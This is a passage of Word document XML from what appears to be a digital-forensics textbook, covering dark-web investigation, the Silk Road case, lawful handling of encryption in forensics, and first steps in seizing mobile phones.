        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Cryptocurrency payments</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — transactions are pseudonymous and often mixed or tumbled.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Encryption everywhere</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — chats and files are protected end to end.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Jurisdiction</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — servers, operators and victims are in different countries.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Legal and safety risks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — investigators must have authority before entering or interacting, avoid downloading illegal material, and protect themselves from malware.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">How investigators still make progress</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">OSINT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and monitoring of forums; undercover operations by trained law-enforcement officers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Blockchain analysis</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — tracing bitcoin flows to exchanges where users were identified (KYC).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Mistakes by the operators</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — misconfigured servers leaking the real IP, reused usernames or e-mail addresses, personal details in posts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Seizure of servers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, device forensics of arrested users (history, wallets, Tor browser traces), and international cooperation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="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Silk Road</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Silk Road was an early dark-web drug marketplace (2011–2013). Investigators combined several clues: the founder’s early forum posts using a personal email address, a server configuration leak that revealed an IP address, and bitcoin tracing. The arrest was timed so that his laptop could be taken while it was open and logged in. The case shows that dark-web investigations succeed mainly through </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">operator mistakes and traditional evidence</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">, not by breaking Tor itself.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">4.9 Encryption Challenges in Forensics</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Encryption</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> converts readable data into unreadable ciphertext that can only be opened with a key or password. Good encryption is a major privacy protection, but it is also one of the biggest obstacles for investigators.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3411"/>
        <w:gridCol w:w="3411"/>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Where encryption appears</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Examples</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Forensic issue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Full-disk / volume encryption</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BitLocker, VeraCrypt, FileVault, LUKS</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powered-off disk image is unreadable without the key or password</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File and archive encryption</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Encrypted ZIP, PDF, Office files</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Files cannot be opened or searched</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Mobile device encryption</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iOS Data Protection, Android file-based encryption</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Locked, newer phones are very hard to access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Encrypted communication</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HTTPS/TLS, VPNs, WhatsApp/Signal end-to-end encryption</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Packet captures show only encrypted data</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Ransomware encryption</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Strong file encryption by malware</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lost unless a key or backup is found</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">How investigators deal with it (lawfully)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Capture RAM from a running, unlocked system.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Encryption keys and decrypted data are often in memory; that is why live acquisition matters.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Look for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">recovery keys</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and passwords: BitLocker keys saved in Microsoft/Active Directory accounts, printed copies, notes, password managers, browser-saved passwords.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Search </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">swap/hibernation files, backups and cloud copies</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, which may be unencrypted.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">password-recovery</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (dictionary attack with wordlists built from case information) where legally permitted.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Seek </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">legal orders</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> requiring the owner or the provider to help (in India, Section 69 of the IT Act deals with decryption directions); the legal position on forcing a person to reveal a password is complex and varies by country.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">metadata</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that is not encrypted — who communicated with whom and when, file sizes, connection logs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">For mobile: request data from the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">cloud backup</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or provider, subject to legal process.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="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Be honest in the report</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">If data could not be decrypted, say so clearly. Never imply that a locked container is empty or that its contents are known. List what was tried and what remains unknown.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">4.10 Mobile Forensics — Introduction</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Mobile forensics</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the recovery and analysis of data from smartphones and tablets. Phones hold messages, calls, contacts, photos, location history, app data, and web activity — often more personal information than a computer — so they are a major source of evidence.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Handling a seized phone</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Photograph the screen and record the time; do not let the phone lock if it is open.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Prevent remote wiping and new data: place it in a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Faraday bag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or enable </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">flight mode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (preferably with a Faraday shield), and keep it </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">powered</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with a charger.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Record make, model, IMEI, and the lock status. Do </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">not</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> try random passcodes — too many failures may wipe the device.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Use validated mobile forensic tools and note the extraction type.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
